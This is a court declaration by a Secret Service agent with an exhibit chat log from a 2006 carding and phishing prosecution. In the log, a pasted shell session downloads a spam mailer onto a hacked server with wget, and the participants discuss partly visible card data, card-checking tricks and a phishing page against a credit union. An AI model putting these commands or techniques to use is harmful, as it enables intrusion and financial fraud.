## DECLARATION OF SA BRIAN KORBS

1.   My name is Brian Korbs, I am a senior special agent of the U.S. Secret Service.  I have twenty-seven years of experience as a U.S. Secret Service agent.  As part of my duties I am trained as a computer forensic examiner.  I have been conducting computer forensic examinations for about eleven years.

2.   I am the case agent in <u>United States v. Tien Nguyen</u> (2:07-CR-164 MCE.).  I did the computer forensic examinations in this case and recovered extensive chat sessions between the Defendant and others.

3.   Based on context and things discussed, I have concluded that the Defendant used the name "denisektran," the Defendant's brother Roger Tran used the name "scur51," and a subject in Europe used the name "scstrazilesri."

4.   I found the following chat logs on one of the computers seized from the Defendant's bedroom.  There were hundreds, if not thousands, of chats logged:

a.   Attachment 1 is a June 12, 2006 chat between the Defendant and "scstrazilesrl."  On the first page, the Defendant talks about his brother going to "wu," which from context I infer is Western Union.  "Scstrazilesrl" says he has "almost 1k of ebay users," sends credit profiles, and asks for a "lappie," which I infer to be slang for a laptop computer.  The Defendant says "my bro coming home with the lappies :)" and the Defendant says that he will send one.  Later, the two discuss whether to target a "tiny" financial institution because it has high withdrawal limits on its ATM cards.

b.   Attachment 2 is a June 22, 2006 chat between the Defendant and his brother.  The Defendant talks about his pending state case at the beginning.  On the second page, the Defendant helps him use a credit card encoder.

c.   Attachment 3 is a June 29, 2006 chat between the Defendant and his brother.  They discuss a laptop.

d.   Attachment 4 is a December 12, 2006 chat between the Defendant and his brother.  The Defendant transmits complete credit card data (card number, expiration, PIN, and CVV code) and explains how to use a card encoder to write them onto plastic mag-strip cards.  On page two, "denisktran" and "scur51" talk about their mother having stones stolen.  I know from my investigation that the Defendant's mother sells granite.

8.   This is the biggest identity theft case that I have ever

worked on.   I say this based on the hosting of phishing web
sites, the volume of profiles of complete personal information
(including name, date of birth, and social security number), and
the extent and duration of the evidenced by the chat logs.

I declare under penalty of perjury that the foregoing is true and
correct.

DATE:  July 25, 2011      _____
                          SSA BRIAN KORBS

2

# EXHIBIT 1

Nguyen in Chat Session with unknown Romanian Subject:





scstrazilesrl (Mon Jun 12 00:40:31 2006): back
scstrazilesrl (Mon Jun 12 01:20:46 2006): ok
scstrazilesrl (Mon Jun 12 01:20:50 2006): are you on web ?
denisektran (Mon Jun 12 01:21:09 2006): no im home
scstrazilesrl (Mon Jun 12 01:21:20 2006): ok
scstrazilesrl (Mon Jun 12 01:21:21 2006): :)
scstrazilesrl (Mon Jun 12 01:21:30 2006): did you went to wu ?
denisektran (Mon Jun 12 01:21:44 2006): my bro go
scstrazilesrl (Mon Jun 12 01:21:50 2006): ok
scstrazilesrl (Mon Jun 12 01:21:50 2006): ;)
scstrazilesrl (Mon Jun 12 01:21:53 2006): 6 ohio
scstrazilesrl (Mon Jun 12 01:21:53 2006): :D
scstrazilesrl (Mon Jun 12 01:22:09 2006): :)
denisektran (Mon Jun 12 01:22:10 2006): wat name
denisektran (Mon Jun 12 01:22:14 2006): wu?
scstrazilesrl (Mon Jun 12 01:22:25 2006): First Name : Narcis
scstrazilesrl (Mon Jun 12 01:22:30 2006): Last Name : Neciu
scstrazilesrl (Mon Jun 12 01:22:36 2006): City : Drobeta Turnu Severin
scstrazilesrl (Mon Jun 12 01:22:40 2006): State : Mehedinti
scstrazilesrl (Mon Jun 12 01:24:07 2006): http://www.sycomeat.com/phpnuke/index.php
scstrazilesrl (Mon Jun 12 01:24:09 2006): :)
scstrazilesrl (Mon Jun 12 01:25:01 2006): Country Romania
scstrazilesrl (Mon Jun 12 01:26:05 2006): Zip 220054
scstrazilesrl (Mon Jun 12 01:26:32 2006): did you tried the other cards ?
scstrazilesrl (Mon Jun 12 01:26:34 2006): i gaved you ?
scstrazilesrl (Mon Jun 12 02:15:52 2006): :)
denisektran (Mon Jun 12 02:16:15 2006): 6731742923
denisektran (Mon Jun 12 02:16:20 2006): roger tran
denisektran (Mon Jun 12 02:16:29 2006): sacramento
denisektran (Mon Jun 12 02:16:33 2006): ca.
scstrazilesrl (Mon Jun 12 02:16:36 2006): :*
denisektran (Mon Jun 12 02:16:51 2006): 838$
scstrazilesrl (Mon Jun 12 02:16:57 2006): :(
scstrazilesrl (Mon Jun 12 02:17:00 2006): ok
scstrazilesrl (Mon Jun 12 02:17:01 2006): :P
denisektran (Mon Jun 12 02:17:07 2006): 65640 reu.
scstrazilesrl (Mon Jun 12 02:17:18 2006): haaaa ?
scstrazilesrl (Mon Jun 12 02:17:45 2006): what's
scstrazilesrl (Mon Jun 12 02:17:48 2006): curency ?
scstrazilesrl (Mon Jun 12 02:17:50 2006): US DOLARS
scstrazilesrl (Mon Jun 12 02:17:52 2006): OR RON ?
denisektran (Mon Jun 12 02:17:57 2006): reu
scstrazilesrl (Mon Jun 12 02:18:26 2006): MAYBE EURO !?
scstrazilesrl (Mon Jun 12 02:18:45 2006): 656,40 EURO ?
scstrazilesrl (Mon Jun 12 02:18:51 2006): EUR ?
scstrazilesrl (Mon Jun 12 02:21:56 2006): i go now to food
scstrazilesrl (Mon Jun 12 02:21:58 2006): and pickup
scstrazilesrl (Mon Jun 12 02:22:04 2006): see you in one hour
scstrazilesrl (Mon Jun 12 04:11:38 2006): back
scstrazilesrl (Mon Jun 12 04:11:39 2006): :*

scstrazilesrl (Mon Jun 12 04:11:40 2006): :)
scstrazilesrl (Mon Jun 12 08:49:47 2006): there ?

**Conversation joined at Mon Jun 12 09:21:22 2006.**

scstrazilesrl (Mon Jun 12 09:21:22 2006): :)
scstrazilesrl (Mon Jun 12 09:21:26 2006): how are you today ?
scstrazilesrl (Mon Jun 12 09:23:43 2006): that cb&t it's cashed
scstrazilesrl (Mon Jun 12 09:23:43 2006): :P
scstrazilesrl (Mon Jun 12 09:23:48 2006): it's sayd insufficient founds
denisektran (Mon Jun 12 09:28:15 2006): wich
denisektran (Mon Jun 12 09:28:31 2006): cbt?
scstrazilesrl (Mon Jun 12 09:28:33 2006): hold
scstrazilesrl (Mon Jun 12 09:32:11 2006): hold
scstrazilesrl (Mon Jun 12 09:32:11 2006): :(
scstrazilesrl (Mon Jun 12 09:32:17 2006): you didn't cashed that money access
scstrazilesrl (Mon Jun 12 09:32:17 2006): :(
denisektran (Mon Jun 12 09:33:05 2006): nope
scstrazilesrl (Mon Jun 12 09:33:16 2006): ok
scstrazilesrl (Mon Jun 12 09:33:17 2006): :)
scstrazilesrl (Mon Jun 12 09:33:20 2006): the guy cashed it
denisektran (Mon Jun 12 09:33:34 2006): i didnt cash none only the 1k
scstrazilesrl (Mon Jun 12 09:34:20 2006): PX: I SAID IT DIDNT CASH PX: SAID INSUFFIENT
BALANCE PX: I M GONNA MAKE ITS ONLINE AND SEE PX: WHAT IS UP WITH THAT SHIT Narcis: ok
Narcis: so it's sayd issuficient founds right ?
scstrazilesrl (Mon Jun 12 09:34:29 2006): PX: YES
denisektran (Mon Jun 12 09:34:41 2006): means there no cash in the acc
scstrazilesrl (Mon Jun 12 09:34:56 2006): ah ok
scstrazilesrl (Mon Jun 12 09:34:57 2006): :)
scstrazilesrl (Mon Jun 12 09:35:01 2006): so you didn't do it :P
denisektran (Mon Jun 12 09:35:04 2006): no
scstrazilesrl (Mon Jun 12 09:35:09 2006): ok
scstrazilesrl (Mon Jun 12 09:35:13 2006): :P
scstrazilesrl (Mon Jun 12 09:35:13 2006): nop
scstrazilesrl (Mon Jun 12 09:35:15 2006): i've started spam
scstrazilesrl (Mon Jun 12 09:35:16 2006): :)
denisektran (Mon Jun 12 09:35:18 2006): if i did it say daily limit has been reached
scstrazilesrl (Mon Jun 12 09:35:21 2006): myself
scstrazilesrl (Mon Jun 12 09:35:41 2006): eBay Password : Full Name : ███████
scstrazilesrl (Mon Jun 12 09:35:42 2006): :))
scstrazilesrl (Mon Jun 12 09:36:13 2006): :D
scstrazilesrl (Mon Jun 12 09:37:14 2006): a BIN : ████PLATESTE/MBNA AMERICA BANK, N.A.
US 800-441-7048
scstrazilesrl (Mon Jun 12 09:37:16 2006): this one ?
scstrazilesrl (Mon Jun 12 09:37:29 2006): BIN : █████FANTOMA
scstrazilesrl (Mon Jun 12 09:38:07 2006): BIN : █████Arvest Bank DEBIT BUSINESS United States
of America
scstrazilesrl (Mon Jun 12 09:38:11 2006): Credit Card Number : 4908790██████
scstrazilesrl (Mon Jun 12 09:38:13 2006): i think
scstrazilesrl (Mon Jun 12 09:38:15 2006): this will cash :D
denisektran (Mon Jun 12 09:40:26 2006): ok
scstrazilesrl (Mon Jun 12 09:40:33 2006): well
scstrazilesrl (Mon Jun 12 09:40:34 2006): hold
scstrazilesrl (Mon Jun 12 09:41:01 2006): will you shit that lappie today ?
scstrazilesrl (Mon Jun 12 09:41:51 2006): i got almost 1k of ebay users



**scstrazilesrl (Mon Jun 12 09:41:57 2006):** :P
**scstrazilesrl (Mon Jun 12 09:41:57 2006):** what to do with them :P
**scstrazilesrl (Mon Jun 12 09:42:17 2006):** gifts.eBay.com eBay PIN : ████MONEY ACCESS
SERVICE, INC. US 800-622-1040 Mon Jun 12, 2006 2k gifts.eBay.com eBay PIN : ████Wachovia
Bank National Association DEBIT CLASSIC United States... Mon Jun 12, 2006 2k gifts.eBay.com eBay
PIN : ████Bank of Oklahoma, National Association DEBIT CLASSIC United States...
**scstrazilesrl (Mon Jun 12 09:42:31 2006):** gifts.eBay.com eBay PIN : ████PLATESTE/MBNA
AMERICA BANK, N.A. US 800-441-7048
**scstrazilesrl (Mon Jun 12 09:42:37 2006):** gifts.eBay.com eBay PIN : ████FANTOMA Mon Jun 12,
2006 2k gifts.eBay.com eBay PIN : 490879 Arvest Bank DEBIT BUSINESS United States of America
Mon Jun 12, 2006 2k
**scstrazilesrl (Mon Jun 12 09:43:15 2006):** gifts.eBay.com eBay PIN : ████NU PLATESTE/Columbus
Bank & Trust Company CREDIT GOLD/PREM Uni... Mon Jun 12, 2006 2k gifts.eBay.com eBay PIN :
████NU PLATESTE/CITIZENS BANK OF RHODE ISLAND US 800 922 9999 Mon Jun 12, 2006 2k
gifts.eBay.com eBay PIN : ████NU PLATESTE/CITIZENS BANK OF RHODE ISLAND US 800 922
9999 Mon Jun 12, 2006 2k gifts.eBay.com eBay PIN ████POSIBIL/CHASE MANHATTAN BANK
USA, N.A. US 516-934-2000 Mon Jun 12
**scstrazilesrl (Mon Jun 12 09:43:25 2006):** gifts.eBay.com eBay PIN : ████NU
PLATESTE/COLUMBUS BANK & TRUST COMPANY US 8664426227 Sun Jun 11, 2006 2k
gifts.eBay.com eBay PIN ████NU PLATESTE/COLUMBUS BANK & TRUST COMPANY US
8664426227
**scstrazilesrl (Mon Jun 12 09:43:27 2006):** now chose :D
**denisektran (Mon Jun 12 09:53:56 2006):** ████████████████7
**scstrazilesrl (Mon Jun 12 09:54:21 2006):** ████████
**scstrazilesrl (Mon Jun 12 09:54:23 2006):** this one ?
**denisektran (Mon Jun 12 09:54:26 2006):** ████████
**scstrazilesrl (Mon Jun 12 09:54:43 2006):** ok
**scstrazilesrl (Mon Jun 12 09:54:44 2006):** :)
**scstrazilesrl (Mon Jun 12 09:54:50 2006):** don't do it on atm's
**scstrazilesrl (Mon Jun 12 09:55:14 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date : ████CVV Code : ████First Pin ████Last Pin ████
**scstrazilesrl (Mon Jun 12 09:55:43 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date ████CVV Code : 457First Pin : 5150Last Pin : 5150
**scstrazilesrl (Mon Jun 12 09:56:19 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date ████CVV Code ████First Pin ████Last Pin ████
**scstrazilesrl (Mon Jun 12 09:56:47 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date : ████CVV Code ████First Pin ████Last Pin ████
**scstrazilesrl (Mon Jun 12 09:57:12 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date ████CVV Code ████First Pin ████Last Pin ████
**scstrazilesrl (Mon Jun 12 09:57:50 2006):** what about 601100 ?
**scstrazilesrl (Mon Jun 12 09:57:52 2006):** :D
**scstrazilesrl (Mon Jun 12 09:58:38 2006):** Credit Card Number : ████████Expiration Date On
File : Expiration Date : ████CVV Code : ████First Pin : ████Last Pin : ████
**scstrazilesrl (Mon Jun 12 10:01:35 2006):** yea dude ?
**scstrazilesrl (Mon Jun 12 10:01:49 2006):** you was writing me somthing
**denisektran (Mon Jun 12 10:01:59 2006):** okdont worry let ur guy make online i took none;)
**scstrazilesrl (Mon Jun 12 10:02:07 2006):** :))
**scstrazilesrl (Mon Jun 12 10:02:09 2006):** lol
**scstrazilesrl (Mon Jun 12 10:02:12 2006):** i am not woring
**scstrazilesrl (Mon Jun 12 10:02:13 2006):** :))
**scstrazilesrl (Mon Jun 12 10:02:22 2006):** he even don';t know i gaved cards to you
**scstrazilesrl (Mon Jun 12 10:02:22 2006):** ;)
**scstrazilesrl (Mon Jun 12 10:02:28 2006):** listen
**scstrazilesrl (Mon Jun 12 10:02:33 2006):** just do it at pos
**scstrazilesrl (Mon Jun 12 10:02:42 2006):** tell me about the lappie you will send it today ?
**denisektran (Mon Jun 12 10:02:47 2006):** yes

**scstrazilesrl (Mon Jun 12 10:02:56 2006):** what info's do you need ?
**scstrazilesrl (Mon Jun 12 10:03:01 2006):** for that ?
**scstrazilesrl (Mon Jun 12 10:03:04 2006):** Subject Date Size gifts.eBay.com eBay PIN ████████ Bank One, N.A. - Debit DEBIT CLASSIC United States of America ... Mon Jun 12, 2006 2k gifts.eBay.com eBay PIN : 478200 Bank One, N.A. - Debit DEBIT CLASSIC United States of America ... Mon Jun 12, 2006 2k
**scstrazilesrl (Mon Jun 12 10:03:05 2006):** :))
**scstrazilesrl (Mon Jun 12 10:03:06 2006):** hahaha
**scstrazilesrl (Mon Jun 12 10:03:10 2006):** wanna try one of these :D
**denisektran (Mon Jun 12 10:03:11 2006):** yea
**scstrazilesrl (Mon Jun 12 10:03:14 2006):** all cashing bank one
**scstrazilesrl (Mon Jun 12 10:03:15 2006):** ;)
**scstrazilesrl (Mon Jun 12 10:03:21 2006):** but us don't
**denisektran (Mon Jun 12 10:03:21 2006):** really?
**scstrazilesrl (Mon Jun 12 10:03:23 2006):** :(
**denisektran (Mon Jun 12 10:03:25 2006):** us no
**scstrazilesrl (Mon Jun 12 10:03:29 2006):** yes
**scstrazilesrl (Mon Jun 12 10:03:33 2006):** i've told you before
**scstrazilesrl (Mon Jun 12 10:03:35 2006):** IN US
**scstrazilesrl (Mon Jun 12 10:04:12 2006):** Credit Card Number :████████Expiration Date On File : Expiration Date ████CVV Code :███First Pin :███Last Pin ███
**scstrazilesrl (Mon Jun 12 10:04:17 2006):** ah
**scstrazilesrl (Mon Jun 12 10:04:19 2006):** what about
**scstrazilesrl (Mon Jun 12 10:04:21 2006):** ohio ?
**denisektran (Mon Jun 12 10:04:34 2006):** fukkkkk u gave me all decline
**denisektran (Mon Jun 12 10:04:35 2006):** !
**scstrazilesrl (Mon Jun 12 10:04:49 2006):** ok :(
**scstrazilesrl (Mon Jun 12 10:04:51 2006):** not mine
**scstrazilesrl (Mon Jun 12 10:04:56 2006):** so don't blame me
**scstrazilesrl (Mon Jun 12 10:04:58 2006):** i can't verify
**denisektran (Mon Jun 12 10:04:58 2006):** ok
**scstrazilesrl (Mon Jun 12 10:05:00 2006):** i am low
**scstrazilesrl (Mon Jun 12 10:05:09 2006):** sorry for that:*
**denisektran (Mon Jun 12 10:05:17 2006):** low is ok
**denisektran (Mon Jun 12 10:05:26 2006):** it not work?
**scstrazilesrl (Mon Jun 12 10:05:31 2006):** i am low connection i can't verify
**scstrazilesrl (Mon Jun 12 10:05:37 2006):** them b4
**denisektran (Mon Jun 12 10:05:48 2006):** what u use?
**denisektran (Mon Jun 12 10:05:52 2006):** to verify?
**scstrazilesrl (Mon Jun 12 10:05:57 2006):** SKYPE
**scstrazilesrl (Mon Jun 12 10:05:57 2006):** :)
**denisektran (Mon Jun 12 10:06:00 2006):** nononon
**scstrazilesrl (Mon Jun 12 10:06:01 2006):** merchant you gaved me
**scstrazilesrl (Mon Jun 12 10:06:02 2006):** ;)
**scstrazilesrl (Mon Jun 12 10:06:04 2006):** :P
**denisektran (Mon Jun 12 10:06:06 2006):** oh
**denisektran (Mon Jun 12 10:06:10 2006):** 1800#
**denisektran (Mon Jun 12 10:06:12 2006):** ?
**scstrazilesrl (Mon Jun 12 10:06:13 2006):** yes
**scstrazilesrl (Mon Jun 12 10:06:16 2006):** 743#
**scstrazilesrl (Mon Jun 12 10:06:17 2006):** :D
**denisektran (Mon Jun 12 10:06:21 2006):** dont use skype!
**denisektran (Mon Jun 12 10:06:24 2006):** is sux
**scstrazilesrl (Mon Jun 12 10:06:29 2006):** also netzero
**scstrazilesrl (Mon Jun 12 10:06:29 2006):** sux
**scstrazilesrl (Mon Jun 12 10:06:31 2006):** on 2kb/s

scstrazilesrl (Mon Jun 12 10:06:32 2006): =))
scstrazilesrl (Mon Jun 12 10:06:32 2006): :P
denisektran (Mon Jun 12 10:06:46 2006): u not use my script?
scstrazilesrl (Mon Jun 12 10:06:54 2006): wich is your script ?
scstrazilesrl (Mon Jun 12 10:06:59 2006): i don't have it ;)
scstrazilesrl (Mon Jun 12 10:06:59 2006): :P
scstrazilesrl (Mon Jun 12 10:08:08 2006): send it
scstrazilesrl (Mon Jun 12 10:08:09 2006): :P
denisektran (Mon Jun 12 10:09:25 2006): if say adress zip phone wrong ....= good cc
scstrazilesrl (Mon Jun 12 10:09:27 2006): :)
scstrazilesrl (Mon Jun 12 10:09:31 2006): verzion
scstrazilesrl (Mon Jun 12 10:09:32 2006): :P
scstrazilesrl (Mon Jun 12 10:10:02 2006): ok
scstrazilesrl (Mon Jun 12 10:10:04 2006): :*
denisektran (Mon Jun 12 10:10:05 2006): is good cause it dont charge none the cc
scstrazilesrl (Mon Jun 12 10:10:25 2006): nice :D
denisektran (Mon Jun 12 10:10:28 2006): cause adresss wrong so it not charge any
scstrazilesrl (Mon Jun 12 10:10:40 2006): :)
scstrazilesrl (Mon Jun 12 10:10:41 2006): :P
scstrazilesrl (Mon Jun 12 10:10:46 2006): nice shit
denisektran (Mon Jun 12 10:12:12 2006): some fantima cc pass cause they not need avs.....so u must change the email in source to use script
scstrazilesrl (Mon Jun 12 10:14:01 2006): :)
scstrazilesrl (Mon Jun 12 10:14:02 2006): :P
scstrazilesrl (Mon Jun 12 10:14:02 2006): ok
scstrazilesrl (Mon Jun 12 10:14:03 2006): ;)
scstrazilesrl (Mon Jun 12 10:14:13 2006): now ready to 2 spam ?
scstrazilesrl (Mon Jun 12 10:14:19 2006): i've sented emails
scstrazilesrl (Mon Jun 12 10:14:22 2006): i am waiting results
scstrazilesrl (Mon Jun 12 10:14:23 2006): :)
denisektran (Mon Jun 12 10:14:31 2006): ok..ill start sending
scstrazilesrl (Mon Jun 12 10:14:49 2006): :P
scstrazilesrl (Mon Jun 12 10:14:53 2006): i've started
denisektran (Mon Jun 12 10:15:03 2006): u use ams?
scstrazilesrl (Mon Jun 12 10:15:06 2006): no
scstrazilesrl (Mon Jun 12 10:15:08 2006): php emailer
scstrazilesrl (Mon Jun 12 10:15:11 2006): i did it from roots
denisektran (Mon Jun 12 10:15:12 2006): ok..
scstrazilesrl (Mon Jun 12 10:15:41 2006): when you need info's for shipping ask me and tell me all you need ;)
denisektran (Mon Jun 12 10:16:27 2006): put up i use this
scstrazilesrl (Mon Jun 12 10:16:40 2006): i have sent spam from root's
scstrazilesrl (Mon Jun 12 10:16:46 2006): ok hold
scstrazilesrl (Mon Jun 12 10:20:03 2006): 210.4.77.142 - /horde/ horddy> uname -a Linux smtp.bdcom.com 2.6.9-11.EL #1 Wed Jun 8 16:59:52 CDT 2005 i686 i686 i386 GNU/Linux horddy> cd /var/www/html/center/;wget 84.247.60.43/mailer.txt;mv mailer.txt mailer.php;ls -la mailer.php;pwd -rw------- 1 apache apache 8702 Jun 12 23:16 mailer.php /var/www/html/center horddy>
scstrazilesrl (Mon Jun 12 10:20:05 2006): one done
scstrazilesrl (Mon Jun 12 10:20:06 2006): :)
scstrazilesrl (Mon Jun 12 10:20:16 2006): http://210.4.77.142/center/mailer.php
denisektran (Mon Jun 12 10:20:34 2006): k
scstrazilesrl (Mon Jun 12 10:20:43 2006): hold i will make more :D
scstrazilesrl (Mon Jun 12 10:20:44 2006): ;)
scstrazilesrl (Mon Jun 12 10:21:34 2006): test them b4
scstrazilesrl (Mon Jun 12 10:38:52 2006): http://210.48.96.189/mailer.php
scstrazilesrl (Mon Jun 12 10:39:04 2006): :D

scstrazilesrl (Mon Jun 12 10:39:08 2006): how many do you need
scstrazilesrl (Mon Jun 12 10:40:02 2006): still there ?
denisektran (Mon Jun 12 10:40:13 2006): um..2-3 is ok
scstrazilesrl (Mon Jun 12 10:40:45 2006): hold
scstrazilesrl (Mon Jun 12 10:40:46 2006): to get one
scstrazilesrl (Mon Jun 12 10:40:49 2006): more
scstrazilesrl (Mon Jun 12 10:40:49 2006): :D
scstrazilesrl (Mon Jun 12 10:41:54 2006): we are sorry we cannot connect to your financial instution
scstrazilesrl (Mon Jun 12 10:41:57 2006): what does this means ?
scstrazilesrl (Mon Jun 12 10:43:43 2006): http://210.85.78.87/squirrelmail/mailer.php
scstrazilesrl (Mon Jun 12 10:43:43 2006): ;)
scstrazilesrl (Mon Jun 12 10:43:45 2006): need more ?
scstrazilesrl (Mon Jun 12 10:43:46 2006): :P
denisektran (Mon Jun 12 10:46:29 2006): ?
scstrazilesrl (Mon Jun 12 10:46:34 2006): need more ?
denisektran (Mon Jun 12 10:46:40 2006): thats it
scstrazilesrl (Mon Jun 12 10:46:52 2006): ok :)
scstrazilesrl (Mon Jun 12 10:46:58 2006): i got about 200 HOSTS HACKED
scstrazilesrl (Mon Jun 12 10:46:58 2006): :d
denisektran (Mon Jun 12 10:56:58 2006): mean that they can not reach the bank
denisektran (Mon Jun 12 11:01:18 2006): wat is the link?
denisektran (Mon Jun 12 11:01:22 2006): to page
scstrazilesrl (Mon Jun 12 11:15:26 2006): ;)
scstrazilesrl (Mon Jun 12 11:15:33 2006): i brb now for 20 min's :P
scstrazilesrl (Mon Jun 12 11:15:39 2006): watching tv
scstrazilesrl (Mon Jun 12 11:41:55 2006): :P
scstrazilesrl (Mon Jun 12 12:00:41 2006): 12 PM
scstrazilesrl (Mon Jun 12 12:00:42 2006): :))
scstrazilesrl (Mon Jun 12 12:00:47 2006): 12:00
scstrazilesrl (Mon Jun 12 12:00:51 2006): she loves me ;)
denisektran (Mon Jun 12 12:00:59 2006): ?
scstrazilesrl (Mon Jun 12 12:01:26 2006): at us when the clock its :00
scstrazilesrl (Mon Jun 12 12:01:27 2006): ;)
scstrazilesrl (Mon Jun 12 12:01:32 2006): it's tells that she loves you ;)
scstrazilesrl (Mon Jun 12 12:05:30 2006): did your guy
scstrazilesrl (Mon Jun 12 12:05:32 2006): came back ?
denisektran (Mon Jun 12 12:24:54 2006): my bro comming home with the lappies:)
denisektran (Mon Jun 12 12:25:02 2006): :D
scstrazilesrl (Mon Jun 12 12:25:13 2006): ;)
scstrazilesrl (Mon Jun 12 12:25:13 2006): :P
scstrazilesrl (Mon Jun 12 12:25:16 2006): i want one :D
denisektran (Mon Jun 12 12:25:28 2006): yep
scstrazilesrl (Mon Jun 12 12:25:38 2006): what about cc's
scstrazilesrl (Mon Jun 12 12:25:39 2006): ?
scstrazilesrl (Mon Jun 12 12:25:39 2006): :P
denisektran (Mon Jun 12 12:25:41 2006): i send u one..
denisektran (Mon Jun 12 12:25:53 2006): i havent tryed
scstrazilesrl (Mon Jun 12 12:25:59 2006): ok
denisektran (Mon Jun 12 12:25:59 2006): urs...
denisektran (Mon Jun 12 12:26:33 2006): i got fnb-online cc 12k i try to clean it
scstrazilesrl (Mon Jun 12 12:26:43 2006): :)
scstrazilesrl (Mon Jun 12 12:26:44 2006): :P
scstrazilesrl (Mon Jun 12 12:26:46 2006): wich one ?
denisektran (Mon Jun 12 12:26:58 2006): from uiadl
scstrazilesrl (Mon Jun 12 12:27:05 2006): huh
scstrazilesrl (Mon Jun 12 12:27:12 2006): Nice shit

scstrazilesrl (Mon Jun 12 12:27:13 2006): :P
denisektran (Mon Jun 12 12:27:14 2006): the fuker u dont like
denisektran (Mon Jun 12 12:27:19 2006): hehe
scstrazilesrl (Mon Jun 12 12:27:30 2006): :(
denisektran (Mon Jun 12 12:27:42 2006): is ok..u my friend too
denisektran (Mon Jun 12 12:27:48 2006): i send u lappie
denisektran (Mon Jun 12 12:28:06 2006): nothing personal only biz
scstrazilesrl (Mon Jun 12 12:28:09 2006): oh fuck :( he is lucky !
scstrazilesrl (Mon Jun 12 12:28:10 2006): ;)
scstrazilesrl (Mon Jun 12 12:28:13 2006): i know
scstrazilesrl (Mon Jun 12 12:28:14 2006): :P
scstrazilesrl (Mon Jun 12 12:28:17 2006): good to him :)
denisektran (Mon Jun 12 12:28:56 2006): im happy today he give my share to me 45k
scstrazilesrl (Mon Jun 12 12:29:13 2006): share of what ?
scstrazilesrl (Mon Jun 12 12:29:18 2006): from where 45k ?
denisektran (Mon Jun 12 12:29:23 2006): from bancorp
scstrazilesrl (Mon Jun 12 12:29:29 2006): HUH
scstrazilesrl (Mon Jun 12 12:29:35 2006): still works ?
scstrazilesrl (Mon Jun 12 12:29:36 2006): or how ?
denisektran (Mon Jun 12 12:29:38 2006): he hold my MO
scstrazilesrl (Mon Jun 12 12:29:45 2006): ah ok
scstrazilesrl (Mon Jun 12 12:29:45 2006): :)
denisektran (Mon Jun 12 12:30:06 2006): until i send his share then he give back to me
denisektran (Mon Jun 12 12:30:19 2006): cause was tooo much cash
denisektran (Mon Jun 12 12:30:24 2006): over 100k
scstrazilesrl (Mon Jun 12 12:30:30 2006): nice shit man :)
scstrazilesrl (Mon Jun 12 12:30:51 2006): i sarted
scstrazilesrl (Mon Jun 12 12:30:52 2006): to late
scstrazilesrl (Mon Jun 12 12:30:54 2006): :(
denisektran (Mon Jun 12 12:31:00 2006): yea...:(
scstrazilesrl (Mon Jun 12 12:31:21 2006): this is it
scstrazilesrl (Mon Jun 12 12:31:25 2006): not so lucky
denisektran (Mon Jun 12 12:32:08 2006): i think if we can target fpsfcu.com we can get $$$$
denisektran (Mon Jun 12 12:32:17 2006): but fukin bank is tiny
denisektran (Mon Jun 12 12:32:21 2006): only 1
scstrazilesrl (Mon Jun 12 12:32:35 2006): ok i will make scam
denisektran (Mon Jun 12 12:32:35 2006): but they are rich
scstrazilesrl (Mon Jun 12 12:32:50 2006): gimme site :)
denisektran (Mon Jun 12 12:33:11 2006): and high limit on atm ... maybe even no limit
scstrazilesrl (Mon Jun 12 12:33:22 2006): :)
scstrazilesrl (Mon Jun 12 12:33:23 2006): nice :P
denisektran (Mon Jun 12 12:33:59 2006): at least 2300 cause we cashed it only 1 we had so not sure
wat limit is
scstrazilesrl (Mon Jun 12 12:34:27 2006): ok np
scstrazilesrl (Mon Jun 12 12:34:29 2006): tell mw
scstrazilesrl (Mon Jun 12 12:34:33 2006): how the shippemnt working
scstrazilesrl (Mon Jun 12 12:34:37 2006): i've never receive
scstrazilesrl (Mon Jun 12 12:34:39 2006): products
scstrazilesrl (Mon Jun 12 12:34:41 2006): till now
denisektran (Mon Jun 12 12:34:45 2006): well..this is wat i plan
denisektran (Mon Jun 12 12:34:56 2006): since is ur fullz i used
denisektran (Mon Jun 12 12:35:09 2006): i will get u a lappie from that store...
denisektran (Mon Jun 12 12:35:22 2006): i have alot of gift cards for it
denisektran (Mon Jun 12 12:35:33 2006): so ill buy it np
denisektran (Mon Jun 12 12:35:46 2006): the store is open 24 hrs
denisektran (Mon Jun 12 12:36:12 2006): we my bro comes ...i will tell him to buy one and ship it

**denisektran (Mon Jun 12 12:36:31 2006):** u have to pick up at customs i think
**denisektran (Mon Jun 12 12:36:42 2006):** at fedex office
**denisektran (Mon Jun 12 12:36:54 2006):** i not sure
**denisektran (Mon Jun 12 12:37:08 2006):** but i kno u have to pay them
**scstrazilesrl (Mon Jun 12 12:37:16 2006):** ok
**scstrazilesrl (Mon Jun 12 12:37:18 2006):** how much :)
**denisektran (Mon Jun 12 12:37:48 2006):** i will say the lappie is a used gift value of 500$
**denisektran (Mon Jun 12 12:38:04 2006):** so u pay lil tax
**denisektran (Mon Jun 12 12:38:16 2006):** i dont kno the rATe
**scstrazilesrl (Mon Jun 12 12:38:21 2006):** ok
**scstrazilesrl (Mon Jun 12 12:38:23 2006):** ;)
**scstrazilesrl (Mon Jun 12 12:38:26 2006):** np
**scstrazilesrl (Mon Jun 12 12:38:34 2006):** what lappie will it be ?
**denisektran (Mon Jun 12 12:38:45 2006):** ill tell him to get the best they have
**scstrazilesrl (Mon Jun 12 12:39:03 2006):** ok try the video got internal memory not shared
**scstrazilesrl (Mon Jun 12 12:39:04 2006):** :D
**denisektran (Mon Jun 12 12:39:12 2006):** i think shared
**denisektran (Mon Jun 12 12:39:16 2006):** all they have
**scstrazilesrl (Mon Jun 12 12:39:23 2006):** tell me the store
**scstrazilesrl (Mon Jun 12 12:39:24 2006):** to check
**denisektran (Mon Jun 12 12:39:29 2006):** walmart.com
**scstrazilesrl (Mon Jun 12 12:39:36 2006):** hold
**scstrazilesrl (Mon Jun 12 12:39:46 2006):** tell me site
**denisektran (Mon Jun 12 12:39:47 2006):** but they not have all they show online in the store
**scstrazilesrl (Mon Jun 12 12:39:50 2006):** for that fuc
**scstrazilesrl (Mon Jun 12 12:39:50 2006):** fcu
**scstrazilesrl (Mon Jun 12 12:39:54 2006):** to make a scam for it
**denisektran (Mon Jun 12 12:39:59 2006):** fpsfcu.com
**scstrazilesrl (Mon Jun 12 12:40:00 2006):** i know :)
**scstrazilesrl (Mon Jun 12 12:43:50 2006):** how much
**scstrazilesrl (Mon Jun 12 12:43:55 2006):** should the price be ?
